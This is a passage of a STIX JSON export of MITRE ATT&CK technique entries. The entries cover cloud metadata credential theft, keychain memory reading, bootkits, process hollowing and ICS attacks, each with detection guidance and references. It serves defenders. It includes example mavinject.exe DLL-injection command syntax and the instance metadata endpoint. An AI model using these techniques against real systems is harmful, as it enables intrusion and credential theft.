metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor access to the Instance Metadata API and look for anomalous queries.\n\nIt may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", "created": "2020-02-11T18:47:46.619Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552/005", "external_id": "T1552.005"}, {"source_name": "AWS Instance Metadata API", "description": "AWS. (n.d.). Instance Metadata and User Data. Retrieved July 18, 2019.", "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html"}, {"source_name": "RedLock Instance Metadata API 2018", "description": "Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.", "url": "https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse"}, {"source_name": "Krebs Capital One August 2019", "description": "Krebs, B.. (2019, August 19). What We Can Learn from the Capital One Hack. Retrieved March 25, 2020.", "url": "https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-29T16:37:34.772Z", "name": "Securityd Memory", "description": "An adversary with root access may gather credentials by reading `securityd`\u2019s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user\u2019s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)\n\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple\u2019s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple\u2019s `securityd` utility takes the user\u2019s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user\u2019s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", "created": "2020-02-12T18:56:31.051Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1555/002", "external_id": "T1555.002"}, {"source_name": "External to DA, the OS X Way", "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way"}, {"source_name": "Apple Dev SecurityD", "description": "Apple. (n.d.). Security Server and Security Agent. Retrieved March 29, 2024.", "url": "https://developer.apple.com/library/archive/documentation/Security/Conceptual/Security_Overview/Architecture/Architecture.html"}, {"source_name": "OS X Keychain", "description": "Juuso Salonen. (2012, September 5). Breaking into the OS X keychain. Retrieved July 15, 2017.", "url": "http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain"}, {"source_name": "OSX Keydnap malware", "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:56:59.793Z", "name": "Manipulation of Control", "description": "Adversaries may manipulate physical process control within the industrial environment. Methods of manipulating control can include changes to set point values, tags, or other parameters. Adversaries may manipulate control systems devices or possibly leverage their own, to communicate with and command physical control processes. The duration of manipulation may be temporary or longer sustained, depending on operator detection. \n\nMethods of Manipulation of Control include: \n\n* Man-in-the-middle \n* Spoof command message \n* Changing setpoints \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. As a consequence, four trams were derailed and twelve people injured due to resulting emergency stops. (Citation: Shelley Smith February 2008) The track controlling commands issued may have also resulted in tram collisions, a further risk to those on board and nearby the areas of impact. (Citation: Bruce Schneier January 2008)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0831", "external_id": "T0831"}, {"source_name": "Bruce Schneier January 2008", "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html"}, {"source_name": "John Bill May 2017", "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/"}, {"source_name": "Shelley Smith February 2008", "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Group Policy Discovery", "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)\n\nAdversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain or Tenant Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Ted Samuels, Rapid7", "Jonhnathan Ribeiro, 3CORESec, @_w0rk3r"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor for suspicious use of gpresult. Monitor for the use of PowerShell functions such as Get-DomainGPO and Get-DomainGPOLocalGroup and processes spawning with command-line arguments containing GPOLocalGroup.\n\nMonitor for abnormal LDAP queries with filters for groupPolicyContainer and high volumes of LDAP traffic to domain controllers. Windows Event ID 4661 can also be used to detect when a directory service has been accessed.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", "created": "2021-08-06T13:10:12.916Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1615", "external_id": "T1615"}, {"source_name": "ADSecurity GPO Persistence 2016", "description": "Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence #17: Group Policy. Retrieved March 5, 2019.", "url": "https://adsecurity.org/?p=2716"}, {"source_name": "Microsoft gpresult", "description": "Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.", "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult"}, {"source_name": "Github PowerShell Empire", "description": "Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.", "url": "https://github.com/PowerShellEmpire/Empire"}, {"source_name": "TechNet Group Policy Basics", "description": "srachui. (2012, February 13). Group Policy Basics \u2013 Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.", "url": "https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:56:59.992Z", "name": "Denial of Service", "description": "Adversaries may perform Denial-of-Service (DoS) attacks to disrupt expected device functionality. Examples of DoS attacks include overwhelming the target device with a high volume of requests in a short time period and sending the target device a request it does not know how to handle. Disrupting device state may temporarily render it unresponsive, possibly lasting until a reboot can occur. When placed in this state, devices may be unable to send and receive requests, and may not perform expected response functions in reaction to other events in the environment. \n\nSome ICS devices are particularly sensitive to DoS events, and may become unresponsive in reaction to even a simple ping sweep. Adversaries may also attempt to execute a Permanent Denial-of-Service (PDoS) against certain devices, such as in the case of the BrickerBot malware. (Citation: ICS-CERT April 2017) \n\nAdversaries may exploit a software vulnerability to cause a denial of service by taking advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in software that can be used to cause a denial of service condition. \n\nAdversaries may have prior knowledge about industrial protocols or control devices used in the environment through [Remote System Information Discovery](https://attack.mitre.org/techniques/T0888). There are examples of adversaries remotely causing a [Device Restart/Shutdown](https://attack.mitre.org/techniques/T0816) by exploiting a vulnerability that induces uncontrolled resource consumption. (Citation: ICS-CERT August 2018) (Citation: Common Weakness Enumeration January 2019) (Citation: MITRE March 2018) ", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "x_mitre_data_sources": ["Network Traffic: Network Traffic Content", "Network Traffic: Network Traffic Flow", "Application Log: Application Log Content", "Operational Databases: Process History/Live Data"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0814", "external_id": "T0814"}, {"source_name": "Common Weakness Enumeration January 2019", "description": "Common Weakness Enumeration 2019, January 03 CWE-400: Uncontrolled Resource Consumption Retrieved. 2019/03/14 ", "url": "http://cwe.mitre.org/data/definitions/400.html"}, {"source_name": "ICS-CERT April 2017", "description": "ICS-CERT 2017, April 18 CS Alert (ICS-ALERT-17-102-01A) BrickerBot Permanent Denial-of-Service Attack Retrieved. 2019/10/24 ", "url": "https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A"}, {"source_name": "ICS-CERT August 2018", "description": "ICS-CERT 2018, August 27 Advisory (ICSA-15-202-01) - Siemens SIPROTEC Denial-of-Service Vulnerability Retrieved. 2019/03/14 ", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01"}, {"source_name": "MITRE March 2018", "description": "MITRE 2018, March 22 CVE-2015-5374 Retrieved. 2019/03/14 ", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5374"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-03-30T21:01:47.417Z", "name": "Bootkit", "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host intrusion prevention systems", "Anti-virus", "File monitoring"], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba", "created": "2019-12-19T21:05:38.123Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1542/003", "external_id": "T1542.003"}, {"source_name": "Mandiant M Trends 2016", "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019.", "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf"}, {"source_name": "Lau 2011", "description": "Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.", "url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Data from Removable Media", "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["William Cain"], "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Privileges to access removable media drive and files"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec", "created": "2017-05-31T21:30:31.584Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1025", "external_id": "T1025"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Code Signing", "description": "Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)\n\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Windows User Account Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1b84d551-6de8-4b96-9930-d177677c3b1d", "created": "2017-05-31T21:31:26.474Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1116", "external_id": "T1116"}, {"source_name": "Wikipedia Code Signing", "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", "url": "https://en.wikipedia.org/wiki/Code_signing"}, {"source_name": "Janicab", "description": "Thomas. (2013, July 15). New signed malware called Janicab. Retrieved July 17, 2017.", "url": "http://www.thesafemac.com/new-signed-malware-called-janicab/"}, {"source_name": "Securelist Digital Certificates", "description": "Ladikov, A. (2015, January 29). Why You Shouldn\u2019t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.", "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/"}, {"source_name": "Symantec Digital Certificates", "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.", "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Mavinject", "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.\n\nAdversaries may rename abusable binaries to evade detections, but the argument INJECTRUNNING is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9", "created": "2021-09-22T17:45:10.241Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/013", "external_id": "T1218.013"}, {"source_name": "ATT Lazarus TTP Evolution", "description": "Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.", "url": "https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution"}, {"source_name": "LOLBAS Mavinject", "description": "LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"}, {"source_name": "Mavinject Functionality Deconstructed", "description": "Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.", "url": "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e"}, {"source_name": "Reaqta Mavinject", "description": "Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.", "url": "https://reaqta.com/2017/12/mavinject-microsoft-injector/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Cloud Instance Metadata API", "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_detection": "* Monitor access to the Instance Metadata API and look for anomalous queries.\n* It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.1", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1c2fd73a-e634-44ed-b1b5-9e7cf7404e9f", "created": "2019-09-04T14:41:32.317Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1522", "external_id": "T1522"}, {"source_name": "AWS Instance Metadata API", "description": "AWS. (n.d.). Instance Metadata and User Data. Retrieved July 18, 2019.", "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html"}, {"source_name": "RedLock Instance Metadata API 2018", "description": "Higashi, Michael. (2018, May 15). Instance Metadata API: A Modern Day Trojan Horse. Retrieved July 16, 2019.", "url": "https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Process Hollowing", "description": "Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis. (Citation: Leitch Hollowing) (Citation: Elastic Process Injection July 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring API calls may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls that unmap process memory, such as ZwUnmapViewOfSection or NtUnmapViewOfSection, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Process whitelisting", "Whitelisting by file name or path", "Signature-based detection", "Anti-virus"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--1c338d0f-a65e-4073-a5c1-c06878849f21", "created": "2017-05-31T21:31:09.815Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1093", "external_id": "T1093"}, {"source_name": "Leitch Hollowing", "description": "Leitch, J. (n.d.). Process Hollowing. Retrieved November 12, 2014.", "url": "http://www.autosectools.com/process-hollowing.pdf"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Local Data Staging", "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.\n\nAdversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Massimiliano Romano, BT Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central 